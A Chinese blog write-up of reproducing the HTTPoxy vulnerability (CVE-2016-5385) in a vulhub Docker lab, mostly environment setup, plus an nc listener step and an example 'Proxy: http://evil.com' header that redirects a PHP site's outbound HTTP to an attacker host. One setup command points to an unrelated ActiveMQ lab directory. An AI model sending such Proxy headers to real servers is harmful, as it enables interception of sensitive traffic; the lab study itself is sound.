vulhub网络安全

CVE-2016-5385

2019-07-24  本文已影响196人  3mi1e

HTTPoxy漏洞(CVE-2016-5385)

1.漏洞影响版本

vulhub中的环境使用的是php
受影响的php版本:
PHP 5.5.37
PHP 5.6.23
PHP 7.0.8
CVE-2016-5385详情信息

2.漏洞危害

重定向HTTP数据到任意代理服务器

3.漏洞POC

不用梯子,添加如下内容到Dockerfile中,否则dockerfile中有apt-get update使用Ubuntu官方源,特别慢或者出错

RUN mv /etc/apt/sources.list /etc/apt/sources.list.bak && \
echo 'deb http://mirrors.163.com/debian/ jessie main non-free contrib' > /etc/apt/sources.list && \
echo 'deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib' >> /etc/apt/sources.list && \
echo 'deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib' >> /etc/apt/sources.list
部署虚拟机
cd /root/vulhub/activemq/CVE-2016-3088              ////进入本次复现的vulhub目录
docker-compose build        

取出dockerfile中的最后两行

Dockerfile

进入刚才编译好的docker环境
docker ps -a
docker start CONTANER ID
docker exec -it CONTANER ID /bin/bash

安装composer

依次执行如下命令

composer config -g repo.packagist composer https://packagist.phpcomposer.com
composer install 
composer update
apt-get purge -y --auto-remove wget zip unzip
docker-compose up -d                            ////docker-compose搭建nginx环境

正常如果是公网服务器,Host与Origin应该是相同的

直接访问页面

使用nc监听端口,添加监听机的Proxy:IP,接受重定向的http数据

获取origin被修改期间的http数据
4.复盘

漏洞出现原因
简单来说,根据RFC 3875规定,cgi(fastcgi)要将用户传入的所有HTTP头都加上HTTP_前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的HTTP_PROXY值作为HTTP代理地址。于是,恶意用户通过提交Proxy: http://evil.com这样的HTTP头,将使用缺陷类库的网站的代理设置为http://evil.com,进而窃取数据包中可能存在的敏感信息。
总结
1.Debian不是Ubuntu。
2.第一次被更新源限制了,但是找到了解决办法,修改Debian更新源,修改Composer下载源。

上一篇下一篇

猜你喜欢

热点阅读